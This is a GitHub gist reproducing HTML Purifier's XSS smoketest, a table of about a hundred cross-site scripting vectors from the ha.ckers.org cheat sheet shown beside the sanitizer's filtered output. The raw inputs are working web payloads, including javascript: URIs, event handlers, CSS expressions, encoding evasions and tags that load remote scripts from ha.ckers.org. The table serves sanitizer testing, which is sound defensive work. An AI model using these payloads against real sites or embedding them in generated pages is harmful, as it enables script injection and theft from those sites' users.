Skip to content

Instantly share code, notes, and snippets.

@f13end

f13end/HTML Purifier XSS Attacks Smoketest

Created May 28, 2020 09:31
Show Gist options
  • Save f13end/99d03f3b90b962f054c1a3b2efaf77fd to your computer and use it in GitHub Desktop.
Save f13end/99d03f3b90b962f054c1a3b2efaf77fd to your computer and use it in GitHub Desktop.
Download ZIP
Raw
HTML Purifier XSS Attacks Smoketest
XSS attacks are from http://ha.ckers.org/xss.html.
Caveats: Google.com has been programatically disallowed, but as you can see, there are ways of getting around that, so coverage in this area is not complete. Most XSS broadcasts its presence by spawning an alert dialogue. The displayed code is not strictly correct, as linebreaks have been forced for readability. Linewraps have been marked with ». Some tests are omitted for your convenience. Not all control characters are displayed.
Test
Name Raw Output Render
XSS Locator
';alert(String.fromCharCode( »
88,83,83))//\';alert(String. »
fromCharCode(88,83,83))//";a »
lert(String.fromCharCode(88, »
83,83))//\";alert(String.fro »
mCharCode(88,83,83))//--></S »
CRIPT>">'><SCRIPT>alert(Stri »
ng.fromCharCode(88,83,83))</ »
SCRIPT>=&{}
';alert(String.fromCharCode( »
88,83,83))//\';alert(String. »
fromCharCode(88,83,83))//";a »
lert(String.fromCharCode(88, »
83,83))//\";alert(String.fro »
mCharCode(88,83,83))//--&gt; »
"&gt;'&gt;=&amp;{}
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//-->">'>=&{}
XSS Quick Test
'';!--"<XSS>=&{()}
'';!--"=&amp;{()}
'';!--"=&{()}
SCRIPT w/Alert()
<SCRIPT>alert('XSS')</SCRIPT »
>
SCRIPT w/Source File
<SCRIPT »
SRC=http://ha.ckers.org/xss. »
js></SCRIPT>
SCRIPT w/Char Code
<SCRIPT>alert(String.fromCha »
rCode(88,83,83))</SCRIPT>
BASE
<BASE »
HREF="javascript:alert('XSS' »
);//">
BGSOUND
<BGSOUND »
SRC="javascript:alert('XSS') »
;">
BODY background-image
<BODY »
BACKGROUND="javascript:alert »
('XSS');">
BODY ONLOAD
<BODY ONLOAD=alert('XSS')>
DIV background-image 1
<DIV »
STYLE="background-image: »
url(javascript:alert('XSS')) »
">
<div></div>
DIV background-image 2
<DIV »
STYLE="background-image: »
url(&#1;javascript:alert('XS »
S'))">
<div></div>
DIV expression
<DIV STYLE="width: »
expression(alert('XSS'));">
<div></div>
FRAME
<FRAMESET><FRAME »
SRC="javascript:alert('XSS') »
;"></FRAMESET>
IFRAME
<IFRAME »
SRC="javascript:alert('XSS') »
;"></IFRAME>
INPUT Image
<INPUT TYPE="IMAGE" »
SRC="javascript:alert('XSS') »
;">
IMG w/JavaScript Directive
<IMG »
SRC="javascript:alert('XSS') »
;">
IMG No Quotes/Semicolon
<IMG »
SRC=javascript:alert('XSS')>
IMG Dynsrc
<IMG »
DYNSRC="javascript:alert('XS »
S');">
IMG Lowsrc
<IMG »
LOWSRC="javascript:alert('XS »
S');">
IMG Embedded commands 1
<IMG »
SRC="http://www.thesiteyouar »
eon.com/somecommand.php?some »
variables=maliciouscode">
<img »
src="http://www.thesiteyouar »
eon.com/somecommand.php?some »
variables=maliciouscode" »
alt="somecommand.php?somevar »
iables=maliciouscode" />
somecommand.php?somevariables=maliciouscode
IMG STYLE w/expression
exp/*<XSS »
STYLE='no\xss:noxss("*//*"); »
xss:&#101;x&#x2F;*XSS*//*/* »
/pression(alert("XSS"))'>
exp/*
exp/*
List-style-image
<STYLE>li {list-style-image: »
url("javascript:alert('XSS') »
");}</STYLE><UL><LI>XSS
<ul><li>XSS</li></ul>
XSS
IMG w/VBscript
<IMG »
SRC='vbscript:msgbox("XSS")' »
>
LAYER
<LAYER »
SRC="http://ha.ckers.org/scr »
iptlet.html"></LAYER>
Livescript
<IMG »
SRC="livescript:[code]">
US-ASCII encoding
scriptalert(XSS)/script »
scriptalert(XSS)/script
scriptalert(XSS)/script
META
<META HTTP-EQUIV="refresh" »
CONTENT="0;url=javascript:al »
ert('XSS');">
META w/data:URL
<META HTTP-EQUIV="refresh" »
CONTENT="0;url=data:text/htm »
l;base64,PHNjcmlwdD5hbGVydCg »
nWFNTJyk8L3NjcmlwdD4K">
META w/additional URL parameter
<META HTTP-EQUIV="refresh" »
CONTENT="0; »
URL=http://;URL=javascript:a »
lert('XSS');">
Mocha
<IMG SRC="mocha:[code]">
OBJECT
<OBJECT »
TYPE="text/x-scriptlet" »
DATA="http://ha.ckers.org/sc »
riptlet.html"></OBJECT>
OBJECT w/Embedded XSS
<OBJECT »
classid=clsid:ae24fdae-03c6- »
11d1-8b76-0080c744f389><para »
m name=url »
value=javascript:alert('XSS' »
)></OBJECT>
Embed Flash
<EMBED »
SRC="http://ha.ckers.org/xss »
.swf" »
AllowScriptAccess="always">< »
/EMBED>
STYLE
<STYLE »
TYPE="text/javascript">alert »
('XSS');</STYLE>
STYLE w/Comment
<IMG »
STYLE="xss:expr/*XSS*/ession »
(alert('XSS'))">
STYLE w/Anonymous HTML
<XSS »
STYLE="xss:expression(alert( »
'XSS'))">
STYLE w/background-image
<STYLE>.XSS{background-image »
:url("javascript:alert('XSS' »
)");}</STYLE><A »
CLASS=XSS></A>
<a class="XSS"></a>
STYLE w/background
<STYLE »
type="text/css">BODY{backgro »
und:url("javascript:alert('X »
SS')")}</STYLE>
Stylesheet
<LINK REL="stylesheet" »
HREF="javascript:alert('XSS' »
);">
Remote Stylesheet 1
<LINK REL="stylesheet" »
HREF="http://ha.ckers.org/xs »
s.css">
Remote Stylesheet 2
<STYLE>@import'http://ha.cke »
rs.org/xss.css';</STYLE>
Remote Stylesheet 3
<META HTTP-EQUIV="Link" »
Content="<http://ha.ckers.or »
g/xss.css>; REL=stylesheet">
Remote Stylesheet 4
<STYLE>BODY{-moz-binding:url »
("http://ha.ckers.org/xssmoz »
.xml#xss")}</STYLE>
TABLE
<TABLE »
BACKGROUND="javascript:alert »
('XSS')"></TABLE>
TD
<TABLE><TD »
BACKGROUND="javascript:alert »
('XSS')"></TD></TABLE>
XML namespace
<HTML xmlns:xss>
<?import »
namespace="xss" »
implementation="http://ha.ck »
ers.org/xss.htc">
<xss:xss>X »
SS</xss:xss>
</HTML>
&lt;?import namespace="xss" »
implementation="http://ha.ck »
ers.org/xss.htc"&gt;
XSS
<?import namespace="xss" implementation="http://ha.ckers.org/xss.htc"> XSS
XML data island w/CDATA
<XML »
ID=I><X><C><![CDATA[<IMG »
SRC="javas]]><![CDATA[cript: »
alert('XSS');">]]>
</C></X> »
</xml><SPAN DATASRC=#I »
DATAFLD=C DATAFORMATAS=HTML>
&lt;IMG »
SRC="javascript:alert('XSS') »
;"&gt;
<span></span>
<IMG SRC="javascript:alert('XSS');">
XML data island w/comment
<XML ID="xss"><I><B><IMG »
SRC="javas<!-- »
-->cript:alert('XSS')"></B>< »
/I></XML>
<SPAN »
DATASRC="#xss" DATAFLD="B" »
DATAFORMATAS="HTML"></SPAN>
<i><b><img src="javas" »
alt="javas&lt;!-- »
--&gt;cript:alert('XSS')" »
/></b></i><span></span>
javas<!-- -->cript:alert('XSS')
XML (locally hosted)
<XML »
SRC="http://ha.ckers.org/xss »
test.xml" ID=I></XML>
<SPAN »
DATASRC=#I DATAFLD=C »
DATAFORMATAS=HTML></SPAN>
<span></span>
XML HTML+TIME
<HTML><BODY>
<?xml:namespace »
prefix="t" »
ns="urn:schemas-microsoft-co »
m:time">
<?import »
namespace="t" »
implementation="#default#tim »
e2">
<t:set »
attributeName="innerHTML" »
to="XSS<SCRIPT »
DEFER>alert('XSS')</SCRIPT>" »
> </BODY></HTML>
&lt;?xml:namespace »
prefix="t" »
ns="urn:schemas-microsoft-co »
m:time"&gt;
&lt;?import »
namespace="t" »
implementation="#default#tim »
e2"&gt;
<?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"> <?import namespace="t" implementation="#default#time2">
Commented-out Block
<!--[if gte IE »
4]>
<SCRIPT>alert('XSS');</S »
CRIPT>
<![endif]-->
Cookie Manipulation
<META »
HTTP-EQUIV="Set-Cookie" »
Content="USERID=<SCRIPT>aler »
t('XSS')</SCRIPT>">
Local .htc file
<XSS STYLE="behavior: »
url(http://ha.ckers.org/xss. »
htc);">
Rename .js to .jpg
<SCRIPT »
SRC="http://ha.ckers.org/xss »
.jpg"></SCRIPT>
SSI
<!--#exec cmd="/bin/echo »
'<SCRIPT SRC'"--><!--#exec »
cmd="/bin/echo »
'=http://ha.ckers.org/xss.js »
></SCRIPT>'"-->
PHP
<? »
echo('<SCR)';
echo('IPT>aler »
t("XSS")</SCRIPT>'); ?>
&lt;? echo('alert("XSS")'); »
?&gt;
<? echo('alert("XSS")'); ?>
JavaScript Includes
<BR SIZE="&{alert('XSS')}">
<br />
Character Encoding Example
<
%3C
&lt
&lt;
&LT
&LT;
&#60 »
&#060
&#0060
&#00060
&#000 »
060
&#0000060
&#60;
&#060;
& »
#0060;
&#00060;
&#000060;
&# »
0000060;
&#x3c
&#x03c
&#x003 »
c
&#x0003c
&#x00003c
&#x0000 »
03c
&#x3c;
&#x03c;
&#x003c; »
&#x0003c;
&#x00003c;
&#x000 »
003c;
&#X3c
&#X03c
&#X003c
& »
#X0003c
&#X00003c
&#X000003c »
&#X3c;
&#X03c;
&#X003c;
&#X »
0003c;
&#X00003c;
&#X000003c »
;
&#x3C
&#x03C
&#x003C
&#x0 »
003C
&#x00003C
&#x000003C
&# »
x3C;
&#x03C;
&#x003C;
&#x000 »
3C;
&#x00003C;
&#x000003C;
& »
#X3C
&#X03C
&#X003C
&#X0003C »
&#X00003C
&#X000003C
&#X3C »
;
&#X03C;
&#X003C;
&#X0003C; »
&#X00003C;
&#X000003C;
\x3c »
\x3C
\u003c
\u003C
&lt;
%3C
&amp;lt
&lt;
&amp;L »
T
&amp;LT;
&lt;
&lt;
&lt;
& »
lt;
&lt;
&lt;
&lt;
&lt;
&lt; »
&lt;
&lt;
&lt;
&lt;
&lt;
&l »
t;
&lt;
&lt;
&lt;
&lt;
&lt;
»
&lt;
&lt;
&lt;
&lt;
&lt;
&l »
t;
&lt;
&lt;
&lt;
&lt;
&lt;
»
&lt;
&lt;
&lt;
&lt;
&lt;
&lt »
;
&lt;
&lt;
&lt;
&lt;
&lt;
»
&lt;
&lt;
&lt;
&lt;
&lt;
&lt »
;
&lt;
&lt;
&lt;
&lt;
&lt;
& »
lt;
&lt;
&lt;
&lt;
&lt;
&lt »
;
&lt;
\x3c
\x3C
\u003c
\u00 »
3C
< %3C &lt < &LT &LT; < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < \x3c \x3C \u003c \u003C
Case Insensitive
<IMG »
SRC=JaVaScRiPt:alert('XSS')>
HTML Entities
<IMG »
SRC=javascript:alert(&quot;X »
SS&quot;)>
Grave Accents
<IMG »
SRC=`javascript:alert("RSnak »
e says, 'XSS'")`>
<img »
src="%60javascript%3Aalert(" »
alt="`javascript:alert(&quot »
;RSnake" />
`javascript:alert("RSnake
Image w/CharCode
<IMG »
SRC=javascript:alert(String. »
fromCharCode(88,83,83))>
UTF-8 Unicode Encoding
<IMG »
SRC=&#106;&#97;&#118;&#97;&# »
115;&#99;&#114;&#105;&#112;& »
#116;&#58;&#97;&#108;&#101;& »
#114;&#116;&#40;&#39;&#88;&# »
83;&#83;&#39;&#41;>
Long UTF-8 Unicode w/out Semicolons
<IMG »
SRC=&#0000106&#0000097&#0000 »
118&#0000097&#0000115&#00000 »
99&#0000114&#0000105&#000011 »
2&#0000116&#0000058&#0000097 »
&#0000108&#0000101&#0000114& »
#0000116&#0000040&#0000039&# »
0000088&#0000083&#0000083&#0 »
000039&#0000041>
DIV w/Unicode
<DIV »
STYLE="background-image:\007 »
5\0072\006C\0028'\006a\0061\ »
0076\0061\0073\0063\0072\006 »
9\0070\0074\003a\0061\006c\0 »
065\0072\0074\0028.1027\0058 »
.1053\0053\0027\0029'\0029">
<div></div>
Hex Encoding w/out Semicolons
<IMG »
SRC=&#x6A&#x61&#x76&#x61&#x7 »
3&#x63&#x72&#x69&#x70&#x74&# »
x3A&#x61&#x6C&#x65&#x72&#x74 »
&#x28&#x27&#x58&#x53&#x53&#x »
27&#x29>
UTF-7 Encoding
<HEAD><META »
HTTP-EQUIV="CONTENT-TYPE" »
CONTENT="text/html; »
charset=UTF-7"> »
</HEAD>+ADw-SCRIPT+AD4-alert »
('XSS');+ADw-/SCRIPT+AD4-
+ADw-SCRIPT+AD4-alert('XSS') »
;+ADw-/SCRIPT+AD4-
+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-
Escaping JavaScript escapes
\";alert('XSS');//
\";alert('XSS');//
\";alert('XSS');//
End title tag
</TITLE><SCRIPT>alert("XSS") »
;</SCRIPT>
STYLE w/broken up JavaScript
<STYLE>@im\port'\ja\vasc\rip »
t:alert("XSS")';</STYLE>
Embedded Tab
<IMG »
SRC="jav\tascript:alert('XSS' »
);">
<img »
src="jav%20ascript%3Aalert(' »
XSS');" alt="jav »
ascript:alert('XSS');" />
jav ascript:alert('XSS');
Embedded Encoded Tab
<IMG »
SRC="jav&#x09;ascript:alert( »
'XSS');">
<img »
src="jav%20ascript%3Aalert(' »
XSS');" alt="jav »
ascript:alert('XSS');" />
jav ascript:alert('XSS');
Embedded Newline
<IMG »
SRC="jav&#x0A;ascript:alert( »
'XSS');">
<img »
src="jav%20ascript%3Aalert(' »
XSS');" alt="jav »
ascript:alert('XSS');" />
jav ascript:alert('XSS');
Embedded Carriage Return
<IMG »
SRC="jav&#x0D;ascript:alert( »
'XSS');">
<img »
src="jav%20ascript%3Aalert(' »
XSS');" alt="jav »
ascript:alert('XSS');" />
jav ascript:alert('XSS');
Multiline w/Carriage Returns
<IMG
SRC
=
"
j
a
v
a
s
c
r
i »
p
t
:
a
l
e
r
t
(
'
X
S
S
' »
)
"
>
<img »
src="j%20a%20v%20a%20s%20c%2 »
0r%20i%20p%20t%20%3A%20a%20l »
%20e%20r%20t%20(%20'%20X%20S »
%20S%20'%20)" alt="j a v a s »
c r i p t : a l e r t ( ' X »
S S ' )" />
j a v a s c r i p t : a l e r t ( ' X S S ' )
Null Chars 1
<IMG »
SRC=java\0script:alert("XSS") »
>
Null Chars 2
&<SCR\0IPT>alert("XSS")</SCR\0 »
IPT>
&amp;
&
Spaces/Meta Chars
<IMG SRC=" &#14; »
javascript:alert('XSS');">
<img src="" alt="" />
Non-Alpha/Non-Digit
<SCRIPT/XSS »
SRC="http://ha.ckers.org/xss »
.js"></SCRIPT>
Non-Alpha/Non-Digit Part 2
<BODY »
onload!#$%&()*~+-_.,:;?@[/|\ »
]^`=alert("XSS")>
No Closing Script Tag
<SCRIPT »
SRC=http://ha.ckers.org/xss. »
js
Protocol resolution in script tags
<SCRIPT »
SRC=//ha.ckers.org/.j>
Half-Open HTML/JavaScript
<IMG »
SRC="javascript:alert('XSS') »
"
Double open angle brackets
<IFRAME »
SRC=http://ha.ckers.org/scri »
ptlet.html <
Extraneous Open Brackets
<<SCRIPT>alert("XSS");//<</S »
CRIPT>
&lt;
<
Malformed IMG Tags
<IMG »
"""><SCRIPT>alert("XSS")</SC »
RIPT>">
"&gt;
">
No Quotes/Semicolons
<SCRIPT>a=/XSS/
alert(a.sour »
ce)</SCRIPT>
Evade Regex Filter 1
<SCRIPT a=">" »
SRC="http://ha.ckers.org/xss »
.js"></SCRIPT>
Evade Regex Filter 2
<SCRIPT ="blah" »
SRC="http://ha.ckers.org/xss »
.js"></SCRIPT>
Evade Regex Filter 3
<SCRIPT a="blah" '' »
SRC="http://ha.ckers.org/xss »
.js"></SCRIPT>
Evade Regex Filter 4
<SCRIPT "a='>'" »
SRC="http://ha.ckers.org/xss »
.js"></SCRIPT>
Evade Regex Filter 5
<SCRIPT a=`>` »
SRC="http://ha.ckers.org/xss »
.js"></SCRIPT>
Filter Evasion 1
<SCRIPT>document.write("<SCR »
I");</SCRIPT>PT »
SRC="http://ha.ckers.org/xss »
.js"></SCRIPT>
PT »
SRC="http://ha.ckers.org/xss »
.js"&gt;
PT SRC="http://ha.ckers.org/xss.js">
Filter Evasion 2
<SCRIPT a=">'>" »
SRC="http://ha.ckers.org/xss »
.js"></SCRIPT>
IP Encoding
<A »
HREF="http://66.102.7.147/"> »
XSS</A>
<a »
href="http://66.102.7.147/"> »
XSS</a>
XSS
URL Encoding
<A »
HREF="http://%77%77%77%2E%67 »
%6F%6F%67%6C%65%2E%63%6F%6D" »
>XSS</A>
<a>XSS</a>
XSS
Dword Encoding
<A »
HREF="http://1113982867/">XS »
S</A>
<a »
href="http://1113982867/">XS »
S</a>
XSS
Hex Encoding
<A »
HREF="http://0x42.0x0000066. »
0x7.0x93/">XSS</A>
<a »
href="http://0x42.0x0000066. »
0x7.0x93/">XSS</a>
XSS
Octal Encoding
<A »
HREF="http://0102.0146.0007. »
00000223/">XSS</A>
<a »
href="http://0102.0146.0007. »
00000223/">XSS</a>
XSS
Mixed Encoding
<A »
HREF="h
tt\tp://6&#09;6.00014 »
6.0x7.147/">XSS</A>
<a »
href="h%20tt%20p%3A//6%206.0 »
00146.0x7.147/">XSS</a>
XSS
Protocol Resolution Bypass
<A »
HREF="//www.google.com/">XSS »
</A>
<a>XSS</a>
XSS
Firefox Lookups 1
<A HREF="//google">XSS</A>
<a href="//google">XSS</a>
XSS
Firefox Lookups 2
<A »
HREF="http://ha.ckers.org@go »
ogle">XSS</A>
<a »
href="http://google">XSS</a>
XSS
Firefox Lookups 3
<A »
HREF="http://google:ha.ckers »
.org">XSS</A>
<a »
href="http://google">XSS</a>
XSS
Removing Cnames
<A »
HREF="http://google.com/">XS »
S</A>
<a>XSS</a>
XSS
Extra dot for Absolute DNS
<A »
HREF="http://www.google.com. »
/">XSS</A>
<a>XSS</a>
XSS
JavaScript Link Location
<A »
HREF="javascript:document.lo »
cation='http://www.google.co »
m/'">XSS</A>
<a>XSS</a>
XSS
Content Replace
<A »
HREF="http://www.gohttp://ww »
w.google.com/ogle.com/">XSS< »
/A>
<a »
href="http://www.gohttp//www »
.google.com/ogle.com/">XSS</ »
a>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment